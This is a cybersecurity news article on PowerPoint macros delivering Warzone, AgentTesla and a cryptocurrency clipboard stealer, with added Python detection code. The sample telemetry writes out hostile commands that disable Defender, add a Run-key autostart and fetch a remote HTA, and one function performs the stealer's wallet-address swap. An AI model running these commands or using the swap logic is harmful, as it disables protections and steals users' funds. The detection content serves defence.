PowerPoint is being used as a lure to spread malware

Malicious actors are sharing malware-bearing PowerPoint files, stored in legitimate cloud services


Threat actors are increasingly turning to Microsoft PowerPoint files to distribute several types of malware.

New Netskope research found that since the end of 2021, a number of hacking groups have been hosting PowerPoint files on legitimate cloud services; once a victim opens the file and enables its macros, those macros can deploy a range of payloads onto the device.

Netskope says three malware families dominate: Warzone (aka AveMaria) and AgentTesla, both powerful Remote Access Trojans (RATs), and cryptocurrency stealers.

Hijacking the clipboard to steal bitcoin

The researchers say the PowerPoint file carries an obfuscated macro which, once a user enables it, runs its payload through a combination of built-in Windows tools, PowerShell and MSHTA (the Microsoft HTML Application host).

Once executed, the VBS script creates a new Windows registry entry for persistence and launches two additional scripts: one downloads AgentTesla, the other disables Microsoft Defender, the antivirus solution built into Windows.
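The chain above (Office process spawning a script host, a Defender-disabling command line, a Run-key write) is exactly what endpoint telemetry can catch. The following is an added example written for this page, not Netskope's or the malware's code: a small Python detector that scans process-creation records in the shape of Sysmon Event ID 1 (assumed) and flags those three behaviours. The sample events, paths and URL are constructed placeholders, not real indicators.

```python
"""Detection of the PowerPoint-to-PowerShell/MSHTA chain described above.

Added example written for this page; it is not Netskope's or the malware's
code. It scans process-creation records in the shape of Sysmon Event ID 1
(assumed) for three behaviours the article names: an Office process
launching mshta.exe/powershell.exe/wscript.exe, a command line that turns
Microsoft Defender real-time protection off, and a write to a registry
Run key. All sample events below are constructed.
"""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe",
                "wscript.exe", "cscript.exe", "cmd.exe"}

# Set-MpPreference switches that disable Defender protections.
DEFENDER_DISABLE = re.compile(
    r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IOAVProtection|"
    r"BehaviorMonitoring|ScriptScanning)\b",
    re.IGNORECASE)
# HKCU/HKLM ...\CurrentVersion\Run is the classic autostart location.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the list of suspicious behaviours seen in one event."""
    hits = []
    if basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if DEFENDER_DISABLE.search(ev.command_line):
        hits.append("defender_disable")
    if RUN_KEY.search(ev.command_line):
        hits.append("run_key_persistence")
    return hits


def scan(events) -> dict:
    """Map pid -> behaviours for every event that triggered at least one rule."""
    findings = {}
    for ev in events:
        hits = classify(ev)
        if hits:
            findings[ev.pid] = hits
    return findings


# Constructed sample telemetry (paths and URL are placeholders, not real IOCs).
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
SAMPLE_EVENTS = [
    ProcEvent(4120, OFFICE, r"C:\Windows\explorer.exe",
              r'"POWERPNT.EXE" C:\Users\victim\Downloads\invoice.ppam'),
    ProcEvent(4188, r"C:\Windows\System32\mshta.exe", OFFICE,
              r"mshta.exe https://example.invalid/stage1.hta"),
    ProcEvent(4210, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\mshta.exe",
              r"powershell.exe -w hidden -c Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(4231, r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\wscript.exe",
              r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\victim\AppData\Roaming\upd.vbs"),
    ProcEvent(4300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", r"powershell.exe -c Get-MpPreference"),
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

The parent/child rule is the high-value one: a benign PowerPoint deck has no reason to start mshta.exe or powershell.exe, so that pairing alone is worth an alert, while the Defender and Run-key rules confirm the later stages. Note that the benign `Get-MpPreference` query and the PowerPoint launch itself produce no findings.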

While it is well known that AgentTesla steals browser passwords, keystrokes, clipboard contents and similar data, very little is known (or shared by Netskope) about Warzone.

The third payload is a cryptocurrency stealer that watches the clipboard for text matching a cryptocurrency wallet address. When the victim copies an address, the stealer silently replaces it with an attacker-controlled address of the same type, so the next paste, and the funds that follow, go to the attackers.
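To make the mechanism concrete, here is an added example written for this page (not the stealer's code and not from Netskope's report): the address check and swap a clipper performs, alongside a defender-side heuristic that flags a wallet address being overwritten by a different one of the same family within a couple of seconds. The address formats are the public Bitcoin and Ethereum ones; every address, process name and the clipboard history are constructed.

```python
"""Clipboard hijacking ("clipper") and a heuristic detector for it.

Added example written for this page, not the stealer's code or Netskope's.
wallet_type() is the address check a clipper performs; clipper_replace()
is the swap itself; detect_swaps() is a defender-side heuristic run over a
clipboard history. The address formats are public (Bitcoin legacy/P2SH,
bech32, Ethereum); all addresses and the clipboard history are constructed.
"""
import re

WALLET_PATTERNS = {
    # Base58 P2PKH ('1...') and P2SH ('3...') addresses.
    "btc_legacy": re.compile(r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$"),
    # Bech32/bech32m: 'bc1' + 39 chars (v0 P2WPKH) up to 59 (P2WSH, taproot).
    "btc_bech32": re.compile(r"^bc1[ac-hj-np-z02-9]{39,59}$"),
    # 0x + 40 hex digits (checksum case not verified here).
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def wallet_type(text: str):
    """Return the wallet family of the clipboard text, or None."""
    s = text.strip()
    for name, pattern in WALLET_PATTERNS.items():
        if pattern.match(s):
            return name
    return None


def clipper_replace(clipboard_text: str, attacker_wallets: dict) -> str:
    """What the stealer does on every clipboard change: if the text is a
    wallet address and the attacker holds one of the same family, swap it;
    otherwise leave the clipboard untouched so the victim notices nothing."""
    kind = wallet_type(clipboard_text)
    if kind in attacker_wallets:
        return attacker_wallets[kind]
    return clipboard_text


SWAP_WINDOW_S = 2.0  # assumption: a person rarely copies two different addresses within 2 s


def detect_swaps(history):
    """history: list of (timestamp_s, owner_process, text) clipboard snapshots.
    Flags a snapshot whose text is a wallet of the same family as the previous
    one but a different value, written within SWAP_WINDOW_S of it: the
    signature of a clipper overwriting a just-copied address."""
    alerts = []
    prev = None  # (timestamp, kind, text)
    for i, (ts, owner, text) in enumerate(history):
        kind = wallet_type(text)
        if (prev and kind and kind == prev[1]
                and text.strip() != prev[2] and ts - prev[0] <= SWAP_WINDOW_S):
            alerts.append((i, prev[2], text.strip(), owner))
        prev = (ts, kind, text.strip())
    return alerts


# Constructed data: addresses and process names are placeholders.
USER_BTC = "1" + "B" * 33
USER_BECH32 = "bc1q" + "z" * 38
USER_ETH = "0x" + "ab" * 20
ATTACKER_WALLETS = {"btc_legacy": "1" + "Z" * 33, "eth": "0x" + "ff" * 20}

CLIPBOARD_HISTORY = [
    (0.0, "chrome.exe", "meeting at 3pm"),
    (5.0, "chrome.exe", USER_BTC),                          # victim copies their address
    (5.2, "unknown.exe", ATTACKER_WALLETS["btc_legacy"]),   # clipper rewrites it
    (30.0, "notepad.exe", USER_ETH),
    (45.0, "notepad.exe", "0x" + "cd" * 20),                # second address 15 s later: benign
    (60.0, "chrome.exe", USER_BECH32),                      # no attacker bech32 address to swap in
]

if __name__ == "__main__":
    print(detect_swaps(CLIPBOARD_HISTORY))
```

Two points the code makes that the paragraph does not: a clipper only swaps families it holds an address for (the bech32 copy above passes through untouched), and the most reliable user-side defence remains comparing the pasted address character by character against the one you meant to copy, since the swap is invisible until then.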


Office macros have long been a staple of malware distribution. They let Office files carry embedded code written in Visual Basic for Applications (VBA); a macro holds a sequence of commands, recorded or written by hand, that is replayed when it runs. Designed to automate repetitive tasks, macros have been hijacked by criminals as a way to execute arbitrary code on a victim's machine the moment the user clicks "Enable Content".

It has reached the point where Microsoft disabled Excel 4.0 (XLM) macros by default to keep users safe, and in 2022 also began blocking VBA macros by default in Office files downloaded from the internet.

Via: BleepingComputer

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.